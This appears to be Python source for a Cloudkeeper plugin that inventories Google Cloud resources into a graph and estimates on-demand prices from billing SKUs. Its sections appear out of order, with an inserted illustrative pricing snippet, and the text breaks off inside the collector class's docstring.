""" if resource.instance_type == "" and "custom" in resource._machine_type_link: log.debug(f"Fetching custom instance type for {resource.rtdname}") machine_type = GCPMachineType( resource._machine_type_link.split("/")[-1], {}, _zone=resource.zone(graph), _account=resource.account(graph), link=resource._machine_type_link, ) resource._machine_type_link = None kwargs = {str(machine_type._get_identifier): machine_type.name} common_kwargs = common_resource_kwargs(machine_type) kwargs.update(common_kwargs) gr = gcp_resource(machine_type) request = gr.get(**kwargs) result = request.execute() machine_type.id = result.get("id") machine_type.instance_cores = float(result.get("guestCpus")) machine_type.instance_memory = float(result.get("memoryMb", 0) / 1024) graph.add_resource(machine_type.zone(graph), machine_type) graph.add_edge(machine_type, resource) self.post_process_machine_type(machine_type, graph) resource._machine_type = machine_type self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPInstance, post_process=post_process, search_map={ "__network": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "network" ) ), ], "__subnetwork": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "subnetwork" ) ), ], "machine_type": ["link", "machineType"], }, attr_map={ "instance_status": "status", "machine_type_link": "machineType", }, predecessors=["__network", "__subnetwork", "machine_type"], ) @metrics_collect_disk_types.time() def collect_disk_types(self): def post_process(resource: GCPDiskType, graph: Graph): if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) resource_group_map = { "local-ssd": "LocalSSD", "pd-balanced": "SSD", "pd-ssd": "SSD", "pd-standard": "PDStandard", } resource_group = resource_group_map.get(resource.name) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Storage", "usage_type": "OnDemand", "resource_group": resource_group, } ): try: if resource.region(graph).name not in sku.geo_taxonomy_regions: continue except TypeError: log.exception( f"Problem accessing geo_taxonomy_regions in {sku.rtdname}:" f" {type(sku.geo_taxonomy_regions)}" ) if resource.name == "pd-balanced" and not sku.name.startswith( "Balanced" ): continue if resource.name != "pd-balanced" and sku.name.startswith("Balanced"): continue if resource.zone(graph).name != "undefined" and sku.name.startswith( "Regional" ): continue if ( resource.zone(graph).name == "undefined" and not sku.name.startswith("Regional") and resource.name != "pd-balanced" ): continue skus.append(sku) if len(skus) == 1: graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 else: log.debug(f"Unable to determine SKU for {resource}") self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDiskType, post_process=post_process, ) @metrics_collect_networks.time() def collect_networks(self): self.collect_something( resource_class=GCPNetwork, ) @metrics_collect_subnetworks.time() def collect_subnetworks(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSubnetwork, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) 
@metrics_collect_vpn_tunnels.time() def collect_vpn_tunnels(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNTunnel, search_map={ "__vpn_gateway": ["link", "vpnGateway"], "__target_vpn_gateway": ["link", "targetVpnGateway"], }, successors=["__target_vpn_gateway", "__vpn_gateway"], ) @metrics_collect_vpn_gateways.time() def collect_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_target_vpn_gateways.time() def collect_target_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPTargetVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routers.time() def collect_routers(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPRouter, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routes.time() def collect_routes(self): self.collect_something( resource_class=GCPRoute, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_security_policies.time() def collect_security_policies(self): self.collect_something(resource_class=GCPSecurityPolicy) @metrics_collect_snapshots.time() def collect_snapshots(self): self.collect_something( resource_class=GCPSnapshot, search_map={ "volume_id": ["link", "sourceDisk"], }, attr_map={ "volume_size": lambda r: int(r.get("diskSizeGb", -1)), "storage_bytes": lambda r: int(r.get("storageBytes", -1)), }, ) @metrics_collect_ssl_certificates.time() def collect_ssl_certificates(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSSLCertificate, attr_map={ "ctime": lambda r: iso2datetime(r.get("creationTimestamp")), "expires": lambda r: iso2datetime(r.get("expireTime")), "description": "description", "certificate": "certificate", "certificate_type": "type", "certificate_managed": "managed", "subject_alternative_names": "subjectAlternativeNames", }, search_map={ "__user": ["link", "user"], }, successors=["__user"], ) @staticmethod def post_process_machine_type(resource: GCPMachineType, graph: Graph): """Adds edges from machine type to SKUs and determines ondemand pricing TODO: Implement GPU types """ if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Compute", "usage_type": "OnDemand", } ): if sku.resource_group not in ( "G1Small", "F1Micro", "N1Standard", "CPU", "RAM", ): continue if ("custom" not in resource.name and "Custom" in sku.name) or ( "custom" in resource.name and "Custom" not in sku.name ): continue if resource.region(graph).name not in sku.geo_taxonomy_regions: continue if resource.name == "g1-small" and sku.resource_group != "G1Small": continue if resource.name == "f1-micro" and sku.resource_group != "F1Micro": continue if ( resource.name.startswith("n2d-") and not sku.name.startswith("N2D AMD ") ) or ( not resource.name.startswith("n2d-") and sku.name.startswith("N2D AMD ") ): continue if (resource.name.startswith("n2-") and not 
sku.name.startswith("N2 ")) or ( not resource.name.startswith("n2-") and sku.name.startswith("N2 ") ): continue if ( resource.name.startswith("m1-") and not sku.name.startswith("Memory-optimized ") ) or ( not resource.name.startswith("m1-") and sku.name.startswith("Memory-optimized ") ): continue if ( resource.name.startswith("c2-") and not sku.name.startswith("Compute optimized ") ) or ( not resource.name.startswith("c2-") and sku.name.startswith("Compute optimized ") ): continue if resource.name.startswith("n1-") and sku.resource_group != "N1Standard": continue if "custom" not in resource.name: if ( resource.name.startswith("e2-") and not sku.name.startswith("E2 ") ) or ( not resource.name.startswith("e2-") and sku.name.startswith("E2 ") ): continue skus.append(sku) if len(skus) == 1 and resource.name in ("g1-small", "f1-micro"): graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 elif len(skus) == 2 or (len(skus) == 3 and "custom" in resource.name): ondemand_cost = 0 cores = resource.instance_cores ram = resource.instance_memory extended_memory_pricing = False if "custom" in resource.name: extended_memory_pricing = ram / cores > 8 for sku in skus: if "Core" in sku.name: ondemand_cost += sku.usage_unit_nanos * cores elif "Ram" in sku.name: if (extended_memory_pricing and "Extended" not in sku.name) or ( not extended_memory_pricing and "Extended" in sku.name ): continue ondemand_cost += sku.usage_unit_nanos * ram graph.add_edge(sku, resource) if ondemand_cost > 0: resource.ondemand_cost = ondemand_cost / 1000000000 else: log.debug( ( f"Unable to determine SKU(s) for {resource}:" f" {[sku.dname for sku in skus]}" ) ) @metrics_collect_machine_types.time() def collect_machine_types(self): self.collect_something( resource_class=GCPMachineType, paginate_method_name="aggregatedList", search_map={ "_zone": ["name", "zone"], }, attr_map={ "instance_cores": lambda r: float(r.get("guestCpus", 0)), "instance_memory": lambda r: float(r.get("memoryMb", 0) / 1024), }, post_process=self.post_process_machine_type, ) @metrics_collect_network_endpoint_groups.time() def collect_network_endpoint_groups(self): self.collect_something( resource_class=GCPNetworkEndpointGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_global_network_endpoint_groups.time() def collect_global_network_endpoint_groups(self): self.collect_something( resource_class=GCPGlobalNetworkEndpointGroup, search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_instance_groups.time() def collect_instance_groups(self): def post_process(resource: GCPInstanceGroup, graph: Graph): kwargs = {"instanceGroup": resource.name} kwargs.update(common_resource_kwargs(resource)) log.debug(f"Getting instances for {resource}") for r in paginate( gcp_resource=gcp_resource(resource, graph), method_name="listInstances", items_name="items", **kwargs, ): i = graph.search_first("link", r.get("instance")) if i: graph.add_edge(i, resource) self.collect_something( resource_class=GCPInstanceGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, 
predecessors=["__network", "__subnetwork"], post_process=post_process, ) @metrics_collect_instance_group_managers.time() def collect_instance_group_managers(self): self.collect_something( resource_class=GCPInstanceGroupManager, paginate_method_name="aggregatedList", search_map={ "__instance_group": ["link", "instanceGroup"], "__health_checks": [ "link", ( lambda r: [ hc.get("healthCheck", "") for hc in r.get("autoHealingPolicies", []) ] ), ], }, predecessors=["__instance_group", "__health_checks"], ) @metrics_collect_autoscalers.time() def collect_autoscalers(self): self.collect_something( resource_class=GCPAutoscaler, paginate_method_name="aggregatedList", search_map={ "__instance_group_manager": ["link", "target"], }, attr_map={ "min_size": ( lambda r: r.get("autoscalingPolicy", {}).get("minNumReplicas", -1) ), "max_size": ( lambda r: r.get("autoscalingPolicy", {}).get("maxNumReplicas", -1) ), }, successors=["__instance_group_manager"], ) @metrics_collect_health_checks.time() def collect_health_checks(self): self.collect_something( resource_class=GCPHealthCheck, paginate_method_name="aggregatedList", attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", }, ) @metrics_collect_http_health_checks.time() def collect_http_health_checks(self): self.collect_something( resource_class=GCPHTTPHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_https_health_checks.time() def collect_https_health_checks(self): self.collect_something( resource_class=GCPHTTPSHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_url_maps.time() def collect_url_maps(self): self.collect_something( resource_class=GCPUrlMap, paginate_method_name="aggregatedList", search_map={ "__default_service": ["link", "defaultService"], }, successors=["__default_service"], ) @metrics_collect_target_pools.time() def collect_target_pools(self): self.collect_something( resource_class=GCPTargetPool, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__instances": ["link", "instances"], }, attr_map={ "session_affinity": "sessionAffinity", "failover_ratio": "failoverRatio", }, predecessors=["__instances", "__health_checks"], ) @metrics_collect_target_instances.time() def collect_target_instances(self): self.collect_something( resource_class=GCPTargetInstance, paginate_method_name="aggregatedList", search_map={ "__instance": ["link", "instance"], }, predecessors=["__instance"], ) @metrics_collect_target_http_proxies.time() def collect_target_http_proxies(self): self.collect_something( resource_class=GCPTargetHttpProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_target_https_proxies.time() def collect_target_https_proxies(self): self.collect_something( resource_class=GCPTargetHttpsProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], "__ssl_certificates": ["link", "sslCertificates"], }, 
predecessors=["__url_map", "__ssl_certificates"], ) @metrics_collect_target_ssl_proxies.time() def collect_target_ssl_proxies(self): self.collect_something( resource_class=GCPTargetSslProxy, search_map={ "__service": ["link", "service"], "__ssl_certificates": ["link", "sslCertificates"], }, predecessors=["__service", "__ssl_certificates"], ) @metrics_collect_target_tcp_proxies.time() def collect_target_tcp_proxies(self): self.collect_something( resource_class=GCPTargetTcpProxy, search_map={ "__service": ["link", "service"], }, predecessors=["__service"], ) @metrics_collect_target_grpc_proxies.time() def collect_target_grpc_proxies(self): self.collect_something( resource_class=GCPTargetGrpcProxy, search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_backend_services.time() def collect_backend_services(self): self.collect_something( resource_class=GCPBackendService, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__backends": [ "link", (lambda r: [g.get("group", "") for g in r.get("backends", [])]), ], }, predecessors=["__health_checks", "__backends"], ) @metrics_collect_forwarding_rules.time() def collect_forwarding_rules(self): def post_process(resource: GCPForwardingRule, graph: Graph): instances = [ i.name for i in resource.ancestors(graph) if isinstance(i, GCPInstance) ] if len(instances) > 0: resource.backends = sorted(instances) self.collect_something( resource_class=GCPForwardingRule, paginate_method_name="aggregatedList", attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], post_process=post_process, ) @metrics_collect_global_forwarding_rules.time() def collect_global_forwarding_rules(self): self.collect_something( resource_class=GCPGlobalForwardingRule, attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], ) @metrics_collect_buckets.time() def collect_buckets(self): self.collect_something( resource_class=GCPBucket, attr_map={ "ctime": lambda r: iso2datetime(r.get("timeCreated")), "mtime": lambda r: iso2datetime(r.get("updated")), "bucket_location": "location", "bucket_location_type": "locationType", "storage_class": "storageClass", "zone_separation": "zoneSeparation", }, ) @metrics_collect_databases.time() def collect_databases(self): self.collect_something( resource_class=GCPDatabase, attr_map={ "db_type": "databaseVersion", "db_status": "state", "db_endpoint": lambda r: next( iter( [ ip["ipAddress"] for ip in r.get("ipAddresses", []) if ip.get("type") == "PRIMARY" ] ), None, ), "instance_type": lambda r: r.get("settings", {}).get("tier"), "volume_size": lambda r: int( r.get("settings", {}).get("dataDiskSizeGb", -1) ), "tags": lambda r: r.get("settings", {}).get("userLabels", {}), }, search_map={ "_region": ["name", "region"], "_zone": ["name", "gceZone"], }, ) @metrics_collect_services.time() def collect_services(self): def post_process(service: GCPService, graph: Graph): # Right now we are only interested in Compute Engine pricing if service.name != "Compute Engine": return gs = gcp_client("cloudbilling", "v1", credentials=self.credentials) kwargs = {"parent": f"services/{service.id}"} for r in 
paginate( gcp_resource=gs.services().skus(), method_name="list", items_name="skus", **kwargs, ): sku = GCPServiceSKU( r["skuId"], {}, name=r.get("description"), service=r.get("category", {}).get("serviceDisplayName"), resource_family=r.get("category", {}).get("resourceFamily"), resource_group=r.get("category", {}).get("resourceGroup"), usage_type=r.get("category", {}).get("usageType"), pricing_info=r.get("pricingInfo"), service_provider_name=r.get("serviceProviderName"), geo_taxonomy_type=r.get("geoTaxonomy", {}).get("type"), geo_taxonomy_regions=r.get("geoTaxonomy", {}).get("regions"), link=( f"https://{service.client}.googleapis.com/" f"{service.api_version}/{r.get("name")}" ), _account=service.account(graph), _region=service.region(graph), _zone=service.zone(graph), ) graph.add_resource(service, sku) self.collect_something( resource_class=GCPService, paginate_method_name="list", paginate_items_name="services", attr_map={ "id": "serviceId", "name": "displayName", }, post_process=post_process, ) @metrics_collect_instance_templates.time() def collect_instance_templates(self): self.collect_something( resource_class=GCPInstanceTemplate, search_map={ "__machine_type": ["link", "machineType"], }, predecessors=["__machine_type"], )
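# --- Illustrative note (not part of the plugin source) ----------------------
# post_process_machine_type() above derives an hourly on-demand price from the
# machine type's matching "Core" and "Ram" SKUs:
#     ondemand_cost = (core_sku_nanos * vCPUs + ram_sku_nanos * RAM_GiB) / 1e9
# A minimal, self-contained sketch of that arithmetic follows. The SKU prices
# below are hypothetical placeholders; the real values come from the Cloud
# Billing catalog that collect_services() loads into the graph.

def estimate_ondemand_cost(core_sku_nanos: int, ram_sku_nanos: int,
                           cores: float, ram_gib: float) -> float:
    """Hourly price in currency units, given per-core/per-GiB prices in nanos."""
    return (core_sku_nanos * cores + ram_sku_nanos * ram_gib) / 1_000_000_000


if __name__ == "__main__":
    # Hypothetical per-hour SKU prices (nano units) for a 4 vCPU / 16 GiB type.
    print(estimate_ondemand_cost(31_610_000, 4_237_000, cores=4, ram_gib=16))
    # ~0.194 per hour under these made-up inputs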
import cklib.logging import socket from pprint import pformat from retrying import retry from typing import Callable, List, Dict, Type, Union from cklib.baseresources import BaseResource from cklib.graph import Graph from cklib.args import ArgumentParser from cklib.utils import except_log_and_pass from prometheus_client import Summary from .resources import ( GCPProject, GCPQuota, GCPRegion, GCPZone, GCPDiskType, GCPDisk, GCPInstance, GCPMachineType, GCPNetwork, GCPSubnetwork, GCPTargetVPNGateway, GCPVPNGateway, GCPVPNTunnel, GCPRouter, GCPRoute, GCPSecurityPolicy, GCPSnapshot, GCPSSLCertificate, GCPNetworkEndpointGroup, GCPGlobalNetworkEndpointGroup, GCPInstanceGroup, GCPInstanceGroupManager, GCPAutoscaler, GCPHealthCheck, GCPHTTPHealthCheck, GCPHTTPSHealthCheck, GCPUrlMap, GCPTargetPool, GCPTargetHttpProxy, GCPTargetHttpsProxy, GCPTargetSslProxy, GCPTargetTcpProxy, GCPTargetGrpcProxy, GCPTargetInstance, GCPBackendService, GCPForwardingRule, GCPGlobalForwardingRule, GCPBucket, GCPDatabase, GCPService, GCPServiceSKU, GCPInstanceTemplate, ) from .utils import ( Credentials, gcp_client, gcp_resource, paginate, iso2datetime, get_result_data, common_resource_kwargs, retry_on_error, ) log = cklib.logging.getLogger("cloudkeeper." + __name__) metrics_collect_regions = Summary( "cloudkeeper_plugin_gcp_collect_regions_seconds", "Time it took the collect_regions() method", ) metrics_collect_zones = Summary( "cloudkeeper_plugin_gcp_collect_zones_seconds", "Time it took the collect_zones() method", ) metrics_collect_disks = Summary( "cloudkeeper_plugin_gcp_collect_disks_seconds", "Time it took the collect_disks() method", ) metrics_collect_instances = Summary( "cloudkeeper_plugin_gcp_collect_instances_seconds", "Time it took the collect_instances() method", ) metrics_collect_disk_types = Summary( "cloudkeeper_plugin_gcp_collect_disk_types_seconds", "Time it took the collect_disk_types() method", ) metrics_collect_networks = Summary( "cloudkeeper_plugin_gcp_collect_networks_seconds", "Time it took the collect_networks() method", ) metrics_collect_subnetworks = Summary( "cloudkeeper_plugin_gcp_collect_subnetworks_seconds", "Time it took the collect_subnetworks() method", ) metrics_collect_vpn_tunnels = Summary( "cloudkeeper_plugin_gcp_collect_vpn_tunnels_seconds", "Time it took the collect_vpn_tunnels() method", ) metrics_collect_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_vpn_gateways_seconds", "Time it took the collect_vpn_gateways() method", ) metrics_collect_target_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_target_vpn_gateways_seconds", "Time it took the collect_target_vpn_gateways() method", ) metrics_collect_routers = Summary( "cloudkeeper_plugin_gcp_collect_routers_seconds", "Time it took the collect_routers() method", ) metrics_collect_routes = Summary( "cloudkeeper_plugin_gcp_collect_routes_seconds", "Time it took the collect_routes() method", ) metrics_collect_security_policies = Summary( "cloudkeeper_plugin_gcp_collect_security_policies_seconds", "Time it took the collect_security_policies() method", ) metrics_collect_snapshots = Summary( "cloudkeeper_plugin_gcp_collect_snapshots_seconds", "Time it took the collect_snapshots() method", ) metrics_collect_ssl_certificates = Summary( "cloudkeeper_plugin_gcp_collect_ssl_certificates_seconds", "Time it took the collect_ssl_certificates() method", ) metrics_collect_machine_types = Summary( "cloudkeeper_plugin_gcp_collect_machine_types_seconds", "Time it took the collect_machine_types() method", ) 
metrics_collect_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_network_endpoint_groups_seconds", "Time it took the collect_network_endpoint_groups() method", ) metrics_collect_global_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_global_network_endpoint_groups_seconds", "Time it took the collect_global_network_endpoint_groups() method", ) metrics_collect_instance_groups = Summary( "cloudkeeper_plugin_gcp_collect_instance_groups_seconds", "Time it took the collect_instance_groups() method", ) metrics_collect_instance_group_managers = Summary( "cloudkeeper_plugin_gcp_collect_instance_group_managers_seconds", "Time it took the collect_instance_group_managers() method", ) metrics_collect_autoscalers = Summary( "cloudkeeper_plugin_gcp_collect_autoscalers_seconds", "Time it took the collect_autoscalers() method", ) metrics_collect_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_health_checks_seconds", "Time it took the collect_health_checks() method", ) metrics_collect_http_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_http_health_checks_seconds", "Time it took the collect_http_health_checks() method", ) metrics_collect_https_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_https_health_checks_seconds", "Time it took the collect_https_health_checks() method", ) metrics_collect_url_maps = Summary( "cloudkeeper_plugin_gcp_collect_url_maps_seconds", "Time it took the collect_url_maps() method", ) metrics_collect_target_pools = Summary( "cloudkeeper_plugin_gcp_collect_target_pools_seconds", "Time it took the collect_target_pools() method", ) metrics_collect_target_instances = Summary( "cloudkeeper_plugin_gcp_collect_target_instances_seconds", "Time it took the collect_target_instances() method", ) metrics_collect_target_http_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_http_proxies_seconds", "Time it took the collect_target_http_proxies() method", ) metrics_collect_target_https_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_https_proxies_seconds", "Time it took the collect_target_https_proxies() method", ) metrics_collect_target_ssl_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_ssl_proxies_seconds", "Time it took the collect_target_ssl_proxies() method", ) metrics_collect_target_tcp_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_tcp_proxies_seconds", "Time it took the collect_target_tcp_proxies() method", ) metrics_collect_target_grpc_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_grpc_proxies_seconds", "Time it took the collect_target_grpc_proxies() method", ) metrics_collect_backend_services = Summary( "cloudkeeper_plugin_gcp_collect_backend_services_seconds", "Time it took the collect_backend_services() method", ) metrics_collect_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_forwarding_rules_seconds", "Time it took the collect_forwarding_rules() method", ) metrics_collect_global_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_global_forwarding_rules_seconds", "Time it took the collect_global_forwarding_rules() method", ) metrics_collect_buckets = Summary( "cloudkeeper_plugin_gcp_collect_buckets_seconds", "Time it took the collect_buckets() method", ) metrics_collect_databases = Summary( "cloudkeeper_plugin_gcp_collect_databases_seconds", "Time it took the collect_databases() method", ) metrics_collect_services = Summary( "cloudkeeper_plugin_gcp_collect_services_seconds", "Time it took the collect_services() method", ) 
metrics_collect_instance_templates = Summary( "cloudkeeper_plugin_gcp_collect_instance_templates_seconds", "Time it took the collect_instance_templates() method", ) class GCPProjectCollector: """Collects a single GCP project. Responsible for collecting all the resources of an individual project. Builds up its own local graph which is then taken by collect_project() and merged with the plugin graph. This way we can have many instances of GCPProjectCollector running in parallel. All building up individual graphs which in the end are merged to a final graph containing all GCP resources. """ def __init__(self, project: GCPProject) -> None: """ Args: project: The GCP project resource object this project collector is going to collect. """ self.project = project self.credentials = Credentials.get(self.project.id) self.graph = Graph(root=self.project) # Mandatory collectors are always collected regardless of whether # they were included by --gcp-collect or excluded by --gcp-no-collect self.mandatory_collectors = { "regions": self.collect_regions, "zones": self.collect_zones, } # Global collectors are resources that are either specified on a global level # as opposed to a per zone or per region level or they are zone/region # resources that provide a aggregatedList() function returning all resources # for all zones/regions. self.global_collectors = { "services": self.collect_services, "networks": self.collect_networks, "subnetworks": self.collect_subnetworks, "routers": self.collect_routers, "routes": self.collect_routes, "health_checks": self.collect_health_checks, "http_health_checks": self.collect_http_health_checks, "https_health_checks": self.collect_https_health_checks, "machine_types": self.collect_machine_types, "instances": self.collect_instances, "disk_types": self.collect_disk_types, "disks": self.collect_disks, "target_vpn_gateways": self.collect_target_vpn_gateways, "vpn_gateways": self.collect_vpn_gateways, "vpn_tunnels": self.collect_vpn_tunnels, "security_policies": self.collect_security_policies, "snapshots": self.collect_snapshots, "ssl_certificates": self.collect_ssl_certificates, "network_endpoint_groups": self.collect_network_endpoint_groups, "instance_groups": self.collect_instance_groups, "instance_group_managers": self.collect_instance_group_managers, "autoscalers": self.collect_autoscalers, "backend_services": self.collect_backend_services, "url_maps": self.collect_url_maps, "target_pools": self.collect_target_pools, "target_instances": self.collect_target_instances, "target_http_proxies": self.collect_target_http_proxies, "target_https_proxies": self.collect_target_https_proxies, "target_ssl_proxies": self.collect_target_ssl_proxies, "target_tcp_proxies": self.collect_target_tcp_proxies, "target_grpc_proxies": self.collect_target_grpc_proxies, "forwarding_rules": self.collect_forwarding_rules, "buckets": self.collect_buckets, "databases": self.collect_databases, "instance_templates": self.collect_instance_templates, } # Region collectors collect resources in a single region. # They are being passed the GCPRegion resource object as `region` arg. self.region_collectors = {} # Zone collectors are being called for each zone. # They are being passed the GCPZone resource object as `zone` arg. 
self.zone_collectors = {} self.all_collectors = dict(self.mandatory_collectors) self.all_collectors.update(self.global_collectors) self.all_collectors.update(self.region_collectors) self.all_collectors.update(self.zone_collectors) self.collector_set = set(self.all_collectors.keys()) @retry( stop_max_attempt_number=10, wait_exponential_multiplier=3000, wait_exponential_max=300000, retry_on_exception=retry_on_error, ) def collect(self) -> None: """Runs the actual resource collection across all resource collectors. Resource collectors add their resources to the local `self.graph` graph. """ self.graph = Graph(root=self.project) collectors = set(self.collector_set) if len(ArgumentParser.args.gcp_collect) > 0: collectors = set(ArgumentParser.args.gcp_collect).intersection(collectors) if len(ArgumentParser.args.gcp_no_collect) > 0: collectors = collectors - set(ArgumentParser.args.gcp_no_collect) collectors = collectors.union(set(self.mandatory_collectors.keys())) log.debug( ( f"Running the following collectors in {self.project.rtdname}:" f" {', '.join(collectors)}" ) ) for collector_name, collector in self.mandatory_collectors.items(): if collector_name in collectors: log.info(f"Collecting {collector_name} in {self.project.rtdname}") collector() regions = [r for r in self.graph.nodes if isinstance(r, GCPRegion)] zones = [z for z in self.graph.nodes if isinstance(z, GCPZone)] log.debug(f"Found {len(zones)} zones in {len(regions)} regions") for collector_name, collector in self.global_collectors.items(): if collector_name in collectors: log.info(f"Collecting {collector_name} in {self.project.rtdname}") collector() # Todo: parallelize region and zone collection for region in regions: for collector_name, collector in self.region_collectors.items(): if collector_name in collectors: log.info( ( f"Collecting {collector_name} in {region.rtdname}" f" {self.project.rtdname}" ) ) collector(region=region) for zone in zones: for collector_name, collector in self.zone_collectors.items(): if collector_name in collectors: log.info( ( f"Collecting {collector_name} in {zone.rtdname}" f" {self.project.rtdname}" ) ) collector(zone=zone) def default_attributes( self, result: Dict, attr_map: Dict = None, search_map: Dict = None ) -> Dict: """Finds resource attributes in the GCP API result data and returns them together with any graph search results. Args: result: Dict containing the result or a GCP API execute() call. attr_map: Dict of map_to: map_from pairs where map_to is the name of the arg that a Cloudkeeper resource expects and map_from is the name of the key in the result dictionary. search_map: Dict of map_to: [search_attr, search_value_name]. Where map_to is the arg that a Cloudkeeper resource expects. search_attr is the attribute name to search for in the graph and search_value_name is the name of the key in the result dictionary that is passed into the graph search as attribute value. 
Example: result: ``` { 'creationTimestamp': '2020-10-08T05:45:43.294-07:00', 'id': '7684174949783877401', 'kind': 'compute#disk', 'labelFingerprint': '42WmSpB8rSM=', 'lastAttachTimestamp': '2020-10-08T05:45:43.294-07:00', 'name': 'instance-group-1-lnmq', 'physicalBlockSizeBytes': '4096', 'sizeGb': '10', 'status': 'READY', 'selfLink': 'https://www.googleapis.com/.../disks/instance-1-lnmq', 'type': 'https://www.googleapis.com/.../diskTypes/pd-standard', 'users': ['https://www.googleapis.com/.../instances/instance-1-lnmq'], 'zone': 'https://www.googleapis.com/.../zones/europe-west1-d' } attr_map: { "volume_size": "sizeGb", "volume_status": "status", } search_map: { "volume_type": ["link", "type"], "__users": ["link", "users"], } ``` This would create GCPDisk( identifier="7684174949783877401", name="instance-group-1-lnmq", ctime=iso2datetime("2020-10-08T05:45:43.294-07:00"), volume_size="10", volume_status="READY", volume_type=GCPDiskType() link="https://www.googleapis.com/.../disks/instance-1-lnmq" ) Where the GCPDiskType() object would be one that was found in the graph with attribute "link": https://www.googleapis.com/.../diskTypes/pd-standard The map_from and search_value_name in attr_map and search_map respectively can also be a callable which is passed the entire result dict and then responsible for finding and returning the relevant data. E.g. the entry from above: "volume_size": "sizeGb", could also be written as: "volume_size": (lambda r: r.get("sizeGb")), This is mainly useful for searching deeply nested data. Any key in the search_map that starts with an underscore like _users in the example above will only be looked up and if found added to the search_results return value but not be added to kwargs. This returned search data can then be used to draw predecessor and successor edges in the graph. 
